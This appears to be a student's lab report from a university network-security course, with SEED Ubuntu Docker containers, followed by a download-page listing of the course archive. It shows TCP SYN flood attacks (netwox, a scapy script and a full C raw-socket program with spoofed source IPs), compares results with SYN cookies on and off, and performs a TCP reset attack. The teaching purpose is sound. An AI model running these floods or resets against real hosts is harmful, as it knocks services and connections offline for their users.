本机ip(攻击机)
172.17.0.1
![image-20220410193052510](readme.assets/image-20220410193052510.png)
创建子网
sudo docker run -it --name=user --hostname=user --privileged "seedubuntu" /bin/bash
user 172.17.0.2
![image-20220410193418918](readme.assets/image-20220410193418918.png)
server
sudo docker run -it --name=server --hostname=server --privileged "seedubuntu" /bin/bash
![image-20220410194242877](readme.assets/image-20220410194242877.png)
# netwox tcp synflood
首先需要开启目标机的 telnet 服务
service openbsd-inetd start
![image-20220410194453195](readme.assets/image-20220410194453195.png)
## 情况1 关闭SYN cookie
`sysctl -w net.ipv4.tcp_syncookies=0`
![image-20220410194506824](readme.assets/image-20220410194506824.png)
### 攻击前
telnet正常连接
![image-20220410194534568](readme.assets/image-20220410194534568.png)
### 攻击中
攻击命令:netwox 76 -i 172.17.0.3 -p 23
telnet一直显示trying 无法和攻击前一样正常连接
![image-20220410194708567](readme.assets/image-20220410194708567.png)
## 情况2 开启SYN cookie
`sysctl -w net.ipv4.tcp_syncookies=1`
![image-20220410194732075](readme.assets/image-20220410194732075.png)
### 攻击中
user可以通过telnet 连接server 如图
![image-20220410194755390](readme.assets/image-20220410194755390.png)
# scapy tcp synflood
## 关闭SYN cookie
![image-20220408203956085](readme.assets/image-20220408203956085.png)
scapy脚本
```python
#!/usr/bin/python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits
a = IP(dst="172.17.0.3")
b = TCP(sport=1551, dport=23, seq=1551, flags='S')
pkt = a/b
while True:
pkt['IP'].src = str(IPv4Address(getrandbits(32)))
send(pkt, verbose = 0)
```
telnet连不上
![image-20220410194935227](readme.assets/image-20220410194935227.png)
# c tcp synflood
## 关闭SYN cookie
```C
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include "myheader.h"
#define DEST_IP "172.17.0.3"
#define DEST_PORT 23 // Attack the web server
#define PACKET_LEN 1500
unsigned short calculate_tcp_checksum(struct ipheader *ip);
void send_raw_ip_packet(struct ipheader* ip);
/******************************************************************
Spoof a TCP SYN packet.
*******************************************************************/
int main() {
char buffer[PACKET_LEN];
struct ipheader *ip = (struct ipheader *) buffer;
struct tcpheader *tcp = (struct tcpheader *) (buffer +
sizeof(struct ipheader));
srand(time(0)); // Initialize the seed for random # generation.
while (1) {
memset(buffer, 0, PACKET_LEN);
/*********************************************************
Step 1: Fill in the TCP header.
********************************************************/
tcp->tcp_sport = rand(); // Use random source port
tcp->tcp_dport = htons(DEST_PORT);
tcp->tcp_seq = rand(); // Use random sequence #
tcp->tcp_offx2 = 0x50;
tcp->tcp_flags = TH_SYN; // Enable the SYN bit
tcp->tcp_win = htons(20000);
tcp->tcp_sum = 0;
/*********************************************************
Step 2: Fill in the IP header.
********************************************************/
ip->iph_ver = 4; // Version (IPV4)
ip->iph_ihl = 5; // Header length
ip->iph_ttl = 50; // Time to live
ip->iph_sourceip.s_addr = rand(); // Use a random IP address
ip->iph_destip.s_addr = inet_addr(DEST_IP);
ip->iph_protocol = IPPROTO_TCP; // The value is 6.
ip->iph_len = htons(sizeof(struct ipheader) +
sizeof(struct tcpheader));
// Calculate tcp checksum
tcp->tcp_sum = calculate_tcp_checksum(ip);
/*********************************************************
Step 3: Finally, send the spoofed packet
********************************************************/
send_raw_ip_packet(ip);
}
return 0;
}
/*************************************************************
Given an IP packet, send it out using a raw socket.
**************************************************************/
void send_raw_ip_packet(struct ipheader* ip)
{
struct sockaddr_in dest_info;
int enable = 1;
// Step 1: Create a raw network socket.
int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
// Step 2: Set socket option.
setsockopt(sock, IPPROTO_IP, IP_HDRINCL,
&enable, sizeof(enable));
// Step 3: Provide needed information about destination.
dest_info.sin_family = AF_INET;
dest_info.sin_addr = ip->iph_destip;
// Step 4: Send the packet out.
sendto(sock, ip, ntohs(ip->iph_len), 0,
(struct sockaddr *)&dest_info, sizeof(dest_info));
close(sock);
}
unsigned short in_cksum (unsigned short *buf, int length)
{
unsigned short *w = buf;
int nleft = length;
int sum = 0;
unsigned short temp=0;
/*
* The algorithm uses a 32 bit accumulator (sum), adds
* sequential 16 bit words to it, and at the end, folds back all
* the carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* treat the odd byte at the end, if any */
if (nleft == 1) {
*(u_char *)(&temp) = *(u_char *)w ;
sum += temp;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); // add hi 16 to low 16
sum += (sum >> 16); // add carry
return (unsigned short)(~sum);
}
/****************************************************************
TCP checksum is calculated on the pseudo header, which includes
the TCP header and data, plus some part of the IP header.
Therefore, we need to construct the pseudo header first.
*****************************************************************/
unsigned short calculate_tcp_checksum(struct ipheader *ip)
{
struct tcpheader *tcp = (struct tcpheader *)((u_char *)ip +
sizeof(struct ipheader));
int tcp_len = ntohs(ip->iph_len) - sizeof(struct ipheader);
/* pseudo tcp header for the checksum computation */
struct pseudo_tcp p_tcp;
memset(&p_tcp, 0x0, sizeof(struct pseudo_tcp));
p_tcp.saddr = ip->iph_sourceip.s_addr;
p_tcp.daddr = ip->iph_destip.s_addr;
p_tcp.mbz = 0;
p_tcp.ptcl = IPPROTO_TCP;
p_tcp.tcpl = htons(tcp_len);
memcpy(&p_tcp.tcp, tcp, tcp_len);
return (unsigned short) in_cksum((unsigned short *)&p_tcp,
tcp_len + 12);
}
```
telnet连不上
![image-20220410195040808](readme.assets/image-20220410195040808.png)
# RESET
## netwox
用user去telnet服务器
ip.addr==172.17.0.3&&tcp.port==23 # Wireshark过滤器设置
netwox 78 -d docker0# TCP reset攻击命令
用user 去 telnet server
同时使用Wireshark进行抓包,观察到三次握手成功,TCP连接建立,如下图:
![image-20220410195141477](readme.assets/image-20220410195141477.png)
将172.17.0.1作为攻击机 采用 netwox 78 作为攻击手段,首先查看对应网卡,如下
![image-20220410195216285](readme.assets/image-20220410195216285.png)
所以攻击命令 netwox 78 -d docker0
随后开始TCP reset攻击,观察到原有的telnet连接断开,如下
![image-20220410195216285](readme.assets/1.png)
此时查看Wireshark查看抓包情况,观察到有一个RST 包
![image-20220410195216285](readme.assets/2.jpg)
你的攻击是否成功?成功�
没有合适的资源?快使用搜索试试~ 我知道了~
资源推荐
资源详情
资源评论
收起资源包目录
华中科技大学网络空间安全学院-计算机网络安全实验-内含源码和说明书(可自行修改).zip (280个子文件)
0130eca0.0 14B
e27290f6.0 14B
myser.c 6KB
1.c 5KB
attack.c 5KB
mycli.c 5KB
openssl.cnf 11KB
2.jpg 100KB
settings.json 55B
targets.log 222B
dryrun.log 202B
configurationCache.log 139B
Makefile 214B
README.md 15KB
README.md 12KB
README.md 9KB
server-xzc-crt.pem 4KB
ca-xzc-key.pem 2KB
ca-xzc-crt.pem 1KB
ca-xzc-crt.pem 1KB
server-xzc-key.pem 951B
server-xzc-csr.pem 753B
image-20220605205956250.png 600KB
image-20220605210318596.png 499KB
image-20220605210352599.png 492KB
image-20220605210702972.png 490KB
image-20220605230241010.png 452KB
image-20220605230046086.png 439KB
image-20220605230046086.png 439KB
image-20220606150907402.png 435KB
image-20220606150907402.png 435KB
image-20220605192303788.png 433KB
image-20220606150809090.png 430KB
image-20220606150809090.png 430KB
image-20220605230208665.png 423KB
image-20220424123759133.png 397KB
image-20220606150954658.png 395KB
image-20220606150954658.png 395KB
image-20220605210533828.png 387KB
image-20220605192900871.png 380KB
image-20220408201735232.png 360KB
image-20220516130855043.png 346KB
image-20220515213439878.png 332KB
image-20220605192523961.png 320KB
image-20220430131648763.png 294KB
image-20220430131650122.png 294KB
image-20220410223212971.png 294KB
image-20220424124843189.png 288KB
image-20220424124825589.png 288KB
image-20220605225610664.png 288KB
image-20220408214952256.png 286KB
image-20220411001747684.png 271KB
image-20220605225700939.png 265KB
image-20220515193904097.png 247KB
image-20220606150522581.png 246KB
image-20220606150522581.png 246KB
image-20220424130538049.png 236KB
image-20220410224654491.png 235KB
image-20220605192653435.png 234KB
image-20220424130338121.png 217KB
image-20220410212229516.png 212KB
image-20220606150448275.png 211KB
image-20220606150448275.png 211KB
image-20220605191702557.png 211KB
image-20220605201356428.png 209KB
image-20220605201356428.png 209KB
image-20220605225753509.png 204KB
image-20220605225755402.png 204KB
image-20220605205830706.png 202KB
image-20220605205832021.png 202KB
image-20220411001053392.png 200KB
image-20220605205735547.png 192KB
image-20220605205735547.png 192KB
image-20220430133137171.png 192KB
image-20220430133110771.png 192KB
image-20220516131247631.png 192KB
image-20220410212121385.png 190KB
image-20220430134140571.png 189KB
image-20220605201227796.png 186KB
image-20220605201227796.png 186KB
image-20220408203513912.png 182KB
image-20220408203134615.png 181KB
image-20220605225740091.png 180KB
image-20220515205847117.png 179KB
image-20220430133409622.png 177KB
image-20220410201144443.png 171KB
image-20220515193801643.png 171KB
image-20220515205918295.png 170KB
image-20220605201440279.png 167KB
image-20220605201440279.png 167KB
image-20220410205936882.png 165KB
image-20220408211633425.png 160KB
image-20220410204208529.png 159KB
image-20220424140027972.png 155KB
image-20220410220424348.png 155KB
image-20220408211550511.png 151KB
image-20220424141902145.png 150KB
image-20220410194755390.png 150KB
image-20220515195928045.png 150KB
image-20220430133159779.png 149KB
共 280 条
- 1
- 2
- 3
资源评论
小码蚁.
- 粉丝: 2584
- 资源: 4344
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功